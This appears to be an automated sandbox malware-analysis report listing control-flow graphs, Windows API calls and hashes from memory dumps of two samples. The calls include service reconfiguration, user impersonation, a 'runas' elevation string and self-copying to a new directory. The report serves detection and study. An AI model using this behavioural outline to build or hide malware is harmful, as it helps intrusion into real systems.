                              control_flow_graph 17 7ff81a111b10-7ff81a111b17 18 7ff81a111b19-7ff81a111b21 17->18 19 7ff81a111b22-7ff81a111bd8 17->19 18->19 23 7ff81a111bda-7ff81a111be9 19->23 24 7ff81a111c36-7ff81a111c68 19->24 23->24 25 7ff81a111beb-7ff81a111bee 23->25 31 7ff81a111c6a-7ff81a111c7a 24->31 32 7ff81a111cc7-7ff81a111d00 24->32 26 7ff81a111c28-7ff81a111c30 25->26 27 7ff81a111bf0-7ff81a111c03 25->27 26->24 29 7ff81a111c05 27->29 30 7ff81a111c07-7ff81a111c1a 27->30 29->30 30->30 33 7ff81a111c1c-7ff81a111c24 30->33 31->32 34 7ff81a111c7c-7ff81a111c7f 31->34 38 7ff81a111d5e-7ff81a111d97 32->38 39 7ff81a111d02-7ff81a111d11 32->39 33->26 36 7ff81a111cb9-7ff81a111cc1 34->36 37 7ff81a111c81-7ff81a111c94 34->37 36->32 40 7ff81a111c98-7ff81a111cab 37->40 41 7ff81a111c96 37->41 49 7ff81a111d99-7ff81a111da9 38->49 50 7ff81a111df6-7ff81a111e2f 38->50 39->38 42 7ff81a111d13-7ff81a111d16 39->42 40->40 43 7ff81a111cad-7ff81a111cb5 40->43 41->40 44 7ff81a111d18-7ff81a111d2b 42->44 45 7ff81a111d50-7ff81a111d58 42->45 43->36 47 7ff81a111d2d 44->47 48 7ff81a111d2f-7ff81a111d42 44->48 45->38 47->48 48->48 51 7ff81a111d44-7ff81a111d4c 48->51 49->50 52 7ff81a111dab-7ff81a111dae 49->52 56 7ff81a111e8e-7ff81a111ec7 50->56 57 7ff81a111e31-7ff81a111e41 50->57 51->45 54 7ff81a111de8-7ff81a111df0 52->54 55 7ff81a111db0-7ff81a111dc3 52->55 54->50 58 7ff81a111dc5 55->58 59 7ff81a111dc7-7ff81a111dda 55->59 65 7ff81a111ec9-7ff81a111ed9 56->65 66 7ff81a111f26-7ff81a111fe2 ChangeServiceConfigA 56->66 57->56 61 7ff81a111e43-7ff81a111e46 57->61 58->59 59->59 60 7ff81a111ddc-7ff81a111de4 59->60 60->54 62 7ff81a111e48-7ff81a111e5b 61->62 63 7ff81a111e80-7ff81a111e88 61->63 67 7ff81a111e5d 62->67 68 7ff81a111e5f-7ff81a111e72 62->68 63->56 65->66 69 7ff81a111edb-7ff81a111ede 65->69 76 7ff81a111fea-7ff81a111ffc call 7ff81a112049 66->76 77 7ff81a111fe4 66->77 67->68 68->68 70 7ff81a111e74-7ff81a111e7c 68->70 71 7ff81a111f18-7ff81a111f20 69->71 72 7ff81a111ee0-7ff81a111ef3 69->72 70->63 71->66 74 7ff81a111ef5 72->74 75 7ff81a111ef7-7ff81a111f0a 72->75 74->75 75->75 78 7ff81a111f0c-7ff81a111f14 75->78 80 7ff81a112001-7ff81a11202d 76->80 77->76 78->71 81 7ff81a11202f 80->81 82 7ff81a112034-7ff81a112048 80->82 81->82
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ChangeConfigService
                              • String ID:
                              • API String ID: 3849694230-0
                              • Opcode ID: f2175976ef6f4cf7fde7aef1bac76bd09ca1e67016e3b47729099cfc0c9c732b
                              • Instruction ID: 37e8c196fef6c427c8985c1f31087dcbbb14b0bddcb1538f29f200cbb477ce0d
                              • Opcode Fuzzy Hash: f2175976ef6f4cf7fde7aef1bac76bd09ca1e67016e3b47729099cfc0c9c732b
                              • Instruction Fuzzy Hash: FCF18330918F4E4FEB68EF28D8467F977D1FB58350F14426EE84EC7291DA74A5818B82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: 53387a93fd754929b045fc722e7e03cbeec8c09535079fdcbd9220f9a4534524
                              • Instruction ID: 3697a0073c486fc9374ed89a8ebc76c35ff98b64ec38b4d5ccc342160232d1c5
                              • Opcode Fuzzy Hash: 53387a93fd754929b045fc722e7e03cbeec8c09535079fdcbd9220f9a4534524
                              • Instruction Fuzzy Hash: 05919230A18A8D8FEB68EF28C8557E977D1FF54350F00426ED84EC7692DB35A985CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 7ff81a110c34-7ff81a110c3b 118 7ff81a110c3d-7ff81a110c45 117->118 119 7ff81a110c46-7ff81a110ce5 117->119 118->119 123 7ff81a110d40-7ff81a110daa OpenServiceA 119->123 124 7ff81a110ce7-7ff81a110cf6 119->124 131 7ff81a110dac 123->131 132 7ff81a110db2-7ff81a110de6 call 7ff81a110e02 123->132 124->123 125 7ff81a110cf8-7ff81a110cfb 124->125 127 7ff81a110cfd-7ff81a110d10 125->127 128 7ff81a110d35-7ff81a110d3d 125->128 129 7ff81a110d12 127->129 130 7ff81a110d14-7ff81a110d27 127->130 128->123 129->130 130->130 133 7ff81a110d29-7ff81a110d31 130->133 131->132 136 7ff81a110de8 132->136 137 7ff81a110ded-7ff81a110e01 132->137 133->128 136->137
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: OpenService
                              • String ID:
                              • API String ID: 3098006287-0
                              • Opcode ID: b453a426fd942526ddd253ed23e5588652a89737f0e0161a9ed8503fc8dd9910
                              • Instruction ID: 3b89802d743247445bf9ab06c9fedf9491f1baa54a762300e5770074202b0d3e
                              • Opcode Fuzzy Hash: b453a426fd942526ddd253ed23e5588652a89737f0e0161a9ed8503fc8dd9910
                              • Instruction Fuzzy Hash: 5C51A830A18A4D4FEB58EF28C8467E977D1FB59361F10426FE84EC7292DB74E8418B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 138 7ff81a110b2d-7ff81a110bb8 143 7ff81a110bba-7ff81a110bbf 138->143 144 7ff81a110bc2-7ff81a110bc7 138->144 143->144 145 7ff81a110bc9-7ff81a110bce 144->145 146 7ff81a110bd1-7ff81a110c08 OpenSCManagerW 144->146 145->146 147 7ff81a110c0a 146->147 148 7ff81a110c10-7ff81a110c2d 146->148 147->148
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: 46ba86eee75288ee27fdea09f4b3441f60a63c6314cce600b8e2faaf5a169dc2
                              • Instruction ID: 9184d0918a54c587b89f663f9bc7ba39e8e2172002b9333e16496152a6874a51
                              • Opcode Fuzzy Hash: 46ba86eee75288ee27fdea09f4b3441f60a63c6314cce600b8e2faaf5a169dc2
                              • Instruction Fuzzy Hash: D3318F3190CA588FDB29DF98D8896F9BBE0EB69321F00426FD04ED7652DA706445CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 149 7ff81a111a1d-7ff81a111a25 150 7ff81a111a28-7ff81a111ad9 ControlService 149->150 151 7ff81a111a27 149->151 155 7ff81a111adb 150->155 156 7ff81a111ae1-7ff81a111b09 150->156 151->150 155->156
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ControlService
                              • String ID:
                              • API String ID: 253159669-0
                              • Opcode ID: 1dc49b73f0666365fa347fdddfc8c9b11d8e40541ef6cc45d5945e281f98420c
                              • Instruction ID: f3c2062310e1b17cfa9945313942a43f0b748c6b685178b8bfc6e13edc9ab90b
                              • Opcode Fuzzy Hash: 1dc49b73f0666365fa347fdddfc8c9b11d8e40541ef6cc45d5945e281f98420c
                              • Instruction Fuzzy Hash: CF31A13191CB588FDB18DF9CE845AF9BBE0EF55721F04016EE08AD3252DA64A846CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 157 7ff81a11108a-7ff81a1110b3 158 7ff81a1110be-7ff81a111152 FindCloseChangeNotification 157->158 159 7ff81a1110b5-7ff81a1110bd 157->159 163 7ff81a11115a-7ff81a111181 158->163 164 7ff81a111154 158->164 159->158 164->163
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: c804489082be0b49d062199662d4c9f494510a98703287a4b8468a2e4a1ea919
                              • Instruction ID: 31fa94b7bec708cb1deb8f8a83e4b18122f727795acfbbfd748098873ba29188
                              • Opcode Fuzzy Hash: c804489082be0b49d062199662d4c9f494510a98703287a4b8468a2e4a1ea919
                              • Instruction Fuzzy Hash: D831E53190CB888FDB0ADB7888157E9BFF0EF56320F04029FD089C31A2DA656856CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 165 7ff81a111760-7ff81a111767 166 7ff81a111769-7ff81a111771 165->166 167 7ff81a111772-7ff81a111802 ImpersonateLoggedOnUser 165->167 166->167 171 7ff81a11180a-7ff81a111831 167->171 172 7ff81a111804 167->172 172->171
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.444395297.00007FF81A110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF81A110000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ff81a110000_nika.jbxd
                              Similarity
                              • API ID: ImpersonateLoggedUser
                              • String ID:
                              • API String ID: 2216092060-0
                              • Opcode ID: 61c4f53167bcd40922bf0425f98216183fe59bf2ebb7a51137cb10a3fe95564d
                              • Instruction ID: 1a566e9c62d9d00e06c25c3b384d7aab10631c587f2dde57f5e6e15fdfae1f85
                              • Opcode Fuzzy Hash: 61c4f53167bcd40922bf0425f98216183fe59bf2ebb7a51137cb10a3fe95564d
                              • Instruction Fuzzy Hash: 3231C23190CA4C8FEB58DF68D845BE9BBE0EB56321F00426FD049C3192DB74A456CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32(0138E000,?,0138A9A0,0138AF26,?,0138E000,0138AF26,0138E000), ref: 0138A9C3
                              • TerminateProcess.KERNEL32(00000000,?,0138A9A0,0138AF26,?,0138E000,0138AF26,0138E000), ref: 0138A9CA
                              • ExitProcess.KERNEL32 ref: 0138A9DC
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: e6b2722017e70c6626dcc01f917ae2058c37c6834434d146c0243114efb0e646
                              • Instruction ID: 4f3774b90783b3c666ebdbb34f81e6ba4034cbaa7a9239402c135e807a3bd742
                              • Opcode Fuzzy Hash: e6b2722017e70c6626dcc01f917ae2058c37c6834434d146c0243114efb0e646
                              • Instruction Fuzzy Hash: 99E0EC7500420CAFCF22BF58D808A9D3F6DFB51345F154426F90587121CB7AED91DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01387776), ref: 01387A79
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 45ae06f3bec6867be3b447dac1ae33a82115b3629244e34387a2f20b5af009a3
                              • Instruction ID: 4043395f086a585342af44b49effd3690def8d0cb4efb531538e1552ff200652
                              • Opcode Fuzzy Hash: 45ae06f3bec6867be3b447dac1ae33a82115b3629244e34387a2f20b5af009a3
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(013A9708,00000FA0,?,?,01387028), ref: 01387056
                              • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01387028), ref: 01387061
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01387028), ref: 01387072
                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01387084
                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01387092
                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01387028), ref: 013870B5
                              • ___scrt_fastfail.LIBCMT ref: 013870C6
                              • DeleteCriticalSection.KERNEL32(013A9708,00000007,?,?,01387028), ref: 013870D1
                              • CloseHandle.KERNEL32(00000000,?,?,01387028), ref: 013870E1
                              Strings
                              • WakeAllConditionVariable, xrefs: 0138708A
                              • SleepConditionVariableCS, xrefs: 0138707E
                              • kernel32.dll, xrefs: 0138706D
                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0138705C
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                              • API String ID: 3578986977-3242537097
                              • Opcode ID: 7a6f9d6e6ac6e824f51dc1490f24753f39b0c2086c789ce301290fff3374bd94
                              • Instruction ID: 49b9a67a343e893b5db38e9f3665dc7d26b622a3437be9a400926e0e8f26dbe9
                              • Opcode Fuzzy Hash: 7a6f9d6e6ac6e824f51dc1490f24753f39b0c2086c789ce301290fff3374bd94
                              • Instruction Fuzzy Hash: DE0188B5651311ABEB31AF7DAD09B9A3E9DEB44B4DF250035FA00E6348FA72C4018771
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                                • Part of subcall function 01392368: CreateFileW.KERNELBASE(00000000,00000000,?,01392758,?,?,00000000,?,01392758,00000000,0000000C), ref: 01392385
                              • GetLastError.KERNEL32 ref: 013927C3
                              • __dosmaperr.LIBCMT ref: 013927CA
                              • GetFileType.KERNELBASE(00000000), ref: 013927D6
                              • GetLastError.KERNEL32 ref: 013927E0
                              • __dosmaperr.LIBCMT ref: 013927E9
                              • CloseHandle.KERNEL32(00000000), ref: 01392809
                              • CloseHandle.KERNEL32(0138D4F0), ref: 01392956
                              • GetLastError.KERNEL32 ref: 01392988
                              • __dosmaperr.LIBCMT ref: 0139298F
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: c8d3a13cea919737e770e5c3123b870017c7ce504b2f9b99f05aec27f4de5178
                              • Instruction ID: 454d1f781e8e78a9cbd4a721a50f312ca98991874d0c155fe8e80e2fa469cf32
                              • Opcode Fuzzy Hash: c8d3a13cea919737e770e5c3123b870017c7ce504b2f9b99f05aec27f4de5178
                              • Instruction Fuzzy Hash: EAA13932904649AFDF19EF6CD851BAE3BF5AF0A328F140159F811AF392CB359816CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 81 1379c30-1379cba call 1385ac0 call 1372ce0 GetTempPathA 86 1379cc0-1379cc5 81->86 86->86 87 1379cc7-1379d5b call 1385e20 call 1385f70 86->87 93 1379d5d-1379d6c 87->93 94 1379d8c-1379e02 call 1385ac0 call 1372ce0 call 13862f0 call 1385f70 87->94 96 1379d82-1379d89 call 1387684 93->96 97 1379d6e-1379d7c 93->97 115 1379e04-1379e13 94->115 116 1379e33-1379e5b 94->116 96->94 97->96 99 137a181 call 138bcdc 97->99 105 137a186 99->105 107 137a18b-137a1b8 call 13859a0 * 2 CopyFileA call 1375120 105->107 108 137a186 call 138bcdc 105->108 131 137a1ba-137a201 call 1385a80 call 1385ac0 call 1385a80 call 1373b10 107->131 132 137a209-137a20b call 138aa9f 107->132 108->107 118 1379e15-1379e23 115->118 119 1379e29-1379e30 call 1387684 115->119 121 1379e5d-1379e6c 116->121 122 1379e8c-1379edf GetModuleFileNameA 116->122 118->105 118->119 119->116 126 1379e82-1379e89 call 1387684 121->126 127 1379e6e-1379e7c 121->127 123 1379ee0-1379ee5 122->123 123->123 129 1379ee7-1379f38 call 1385e20 123->129 126->122 127->105 127->126 141 1379f94-1379fb4 call 138ab6c 129->141 142 1379f3a-1379f3d 129->142 170 137a206 131->170 138 137a210-137a215 call 138bcdc 132->138 156 1379fb6-1379fd9 call 138abfa call 138ae87 141->156 157 1379fdc-137a000 call 138ab6c 141->157 146 1379f51-1379f54 142->146 147 1379f3f 142->147 152 1379f56-1379f5a 146->152 153 1379f8a 146->153 151 1379f40-1379f44 147->151 151->152 158 1379f46-1379f4f 151->158 159 1379f83-1379f88 152->159 160 1379f5c-1379f5f 152->160 155 1379f8c-1379f8e 153->155 155->141 163 137a083-137a08c 155->163 156->157 173 137a002-137a00b call 138abfa 157->173 174 137a010-137a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 157->174 158->146 158->151 159->155 160->153 165 1379f61-1379f67 160->165 168 137a0bf-137a0e3 163->168 169 137a08e-137a099 163->169 165->159 166 1379f69-1379f6c 165->166 166->153 172 1379f6e-1379f74 166->172 177 137a0e5-137a0f0 168->177 178 137a110-137a134 168->178 175 137a0af-137a0bc call 1387684 169->175 176 137a09b-137a0a9 169->176 170->132 172->159 180 1379f76-1379f79 172->180 173->132 173->163 200 137a077-137a07d 174->200 201 137a06f-137a071 174->201 175->168 176->138 176->175 184 137a106-137a10d call 1387684 177->184 185 137a0f2-137a100 177->185 186 137a136-137a145 178->186 187 137a165-137a180 call 1387012 178->187 180->153 189 1379f7b-1379f81 180->189 184->178 185->138 185->184 195 137a147-137a155 186->195 196 137a15b-137a162 call 1387684 186->196 189->153 189->159 195->138 195->196 196->187 200->163 201->107 201->200
                              APIs
                              • GetTempPathA.KERNEL32(00000104,?), ref: 01379C90
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: PathTemp
                              • String ID:
                              • API String ID: 2920410445-0
                              • Opcode ID: 9157592d6fad718af096125188dad3a3c5b31f0376b5ee9fdb5475f86d8f1cb2
                              • Instruction ID: 0a3402b889e83f5e95f0091f24e663be794ad265902bf30cb62c2a9cc413fd02
                              • Opcode Fuzzy Hash: 9157592d6fad718af096125188dad3a3c5b31f0376b5ee9fdb5475f86d8f1cb2
                              • Instruction Fuzzy Hash: EFA18FB09002688BEF20DB28CC447DDBBB9AB55318F5445D8D60967282DB755FC8CFA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 203 1373ff0-1374050 call 13862f0 call 1386070 208 1374052-137405e 203->208 209 137407e-13740fa call 1385ac0 * 2 call 1372ce0 call 1385e20 call 1373b10 203->209 210 1374074-137407b call 1387684 208->210 211 1374060-137406e 208->211 234 13740fc-1374108 209->234 235 1374128-137412e 209->235 210->209 211->210 213 13741b7 call 138bcdc 211->213 219 13741bc-137428a call 138bcdc call 1385ac0 call 1372ce0 call 1386070 call 1385ac0 call 1372ce0 call 1385e20 call 1373b10 213->219 264 13742b4-13742c5 Sleep 219->264 265 137428c-1374298 219->265 237 137411e-1374125 call 1387684 234->237 238 137410a-1374118 234->238 239 1374130-137413c 235->239 240 1374158-1374170 235->240 237->235 238->219 238->237 245 137414e-1374155 call 1387684 239->245 246 137413e-137414c 239->246 241 1374172-137417e 240->241 242 137419a-13741b6 call 1387012 240->242 247 1374190-1374197 call 1387684 241->247 248 1374180-137418e 241->248 245->240 246->219 246->245 247->242 248->219 248->247 266 13742c7-13742d3 264->266 267 13742ef-1374308 call 1387012 264->267 268 13742aa-13742b1 call 1387684 265->268 269 137429a-13742a8 265->269 272 13742e5-13742ec call 1387684 266->272 273 13742d5-13742e3 266->273 268->264 269->268 270 1374309 call 138bcdc 269->270 276 137430e-137435f call 138bcdc call 1373740 270->276 272->267 273->272 273->276 285 1374363-1374370 SetCurrentDirectoryA 276->285 286 1374361 276->286 287 1374372-137437e 285->287 288 137439e-1374458 call 1385ac0 call 1372ce0 call 1385ac0 call 1372ce0 call 1386070 call 1385f70 call 1385ac0 call 1372ce0 call 1385e20 call 1373b10 285->288 286->285 289 1374394-137439b call 1387684 287->289 290 1374380-137438e 287->290 320 1374486-137449e 288->320 321 137445a-1374466 288->321 289->288 290->289 292 1374558 call 138bcdc 290->292 298 137455d call 138bcdc 292->298 303 1374562-1374567 call 138bcdc 298->303 324 13744a0-13744ac 320->324 325 13744cc-13744e4 320->325 322 137447c-1374483 call 1387684 321->322 323 1374468-1374476 321->323 322->320 323->298 323->322 327 13744c2-13744c9 call 1387684 324->327 328 13744ae-13744bc 324->328 329 13744e6-13744f2 325->329 330 137450e-1374514 325->330 327->325 328->298 328->327 335 1374504-137450b call 1387684 329->335 336 13744f4-1374502 329->336 331 1374516-1374522 330->331 332 137453e-1374557 call 1387012 330->332 337 1374534-137453b call 1387684 331->337 338 1374524-1374532 331->338 335->330 336->298 336->335 337->332 338->303 338->337
                              APIs
                              • Sleep.KERNEL32(000003E8), ref: 013742B9
                              • SetCurrentDirectoryA.KERNEL32(00000000,B7E58ED7), ref: 01374364
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CurrentDirectorySleep
                              • String ID: runas
                              • API String ID: 16921501-4000483414
                              • Opcode ID: 79a8499efd9f16ef97800508f09a5266809aa3edc0858c8e2c3ad633ce19ff35
                              • Instruction ID: ee55293decb642841351271b8c882538907af238489c74af825cf1443c92e6f0
                              • Opcode Fuzzy Hash: 79a8499efd9f16ef97800508f09a5266809aa3edc0858c8e2c3ad633ce19ff35
                              • Instruction Fuzzy Hash: 12E14571A10245ABEB18EB6CCD8579EBF72EF5131CF64825CE401AB3C5DB399A408792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 346 137a032-137a034 347 137a036-137a04d CreateDirectoryA 346->347 348 137a053-137a06d GetFileAttributesA 346->348 347->348 349 137a077-137a08c 348->349 350 137a06f-137a071 348->350 353 137a0bf-137a0e3 349->353 354 137a08e-137a099 349->354 350->349 351 137a18b-137a1b8 call 13859a0 * 2 CopyFileA call 1375120 350->351 382 137a1ba-137a206 call 1385a80 call 1385ac0 call 1385a80 call 1373b10 351->382 383 137a209-137a20b call 138aa9f 351->383 358 137a0e5-137a0f0 353->358 359 137a110-137a134 353->359 356 137a0af-137a0bc call 1387684 354->356 357 137a09b-137a0a9 354->357 356->353 357->356 361 137a210-137a215 call 138bcdc 357->361 363 137a106-137a10d call 1387684 358->363 364 137a0f2-137a100 358->364 366 137a136-137a145 359->366 367 137a165-137a180 call 1387012 359->367 363->359 364->361 364->363 373 137a147-137a155 366->373 374 137a15b-137a162 call 1387684 366->374 373->361 373->374 374->367 382->383 383->361
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0137A04D
                              • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0137A068
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0137A1A5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AttributesCopyCreateDirectory
                              • String ID:
                              • API String ID: 210682061-0
                              • Opcode ID: 85e9020054752c5dfceb845f391c8b133bd8967960f7cc15a0fe82dccd524b3f
                              • Instruction ID: d635d67e4253bcef1f021e31d5cc6f07ae322b2c67322813a711ad0605a80b30
                              • Opcode Fuzzy Hash: 85e9020054752c5dfceb845f391c8b133bd8967960f7cc15a0fe82dccd524b3f
                              • Instruction Fuzzy Hash: C541CBB1A002188BEB25EB2CCC8579CB775AF55318F9405DCD609A7382DB395AC48F66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
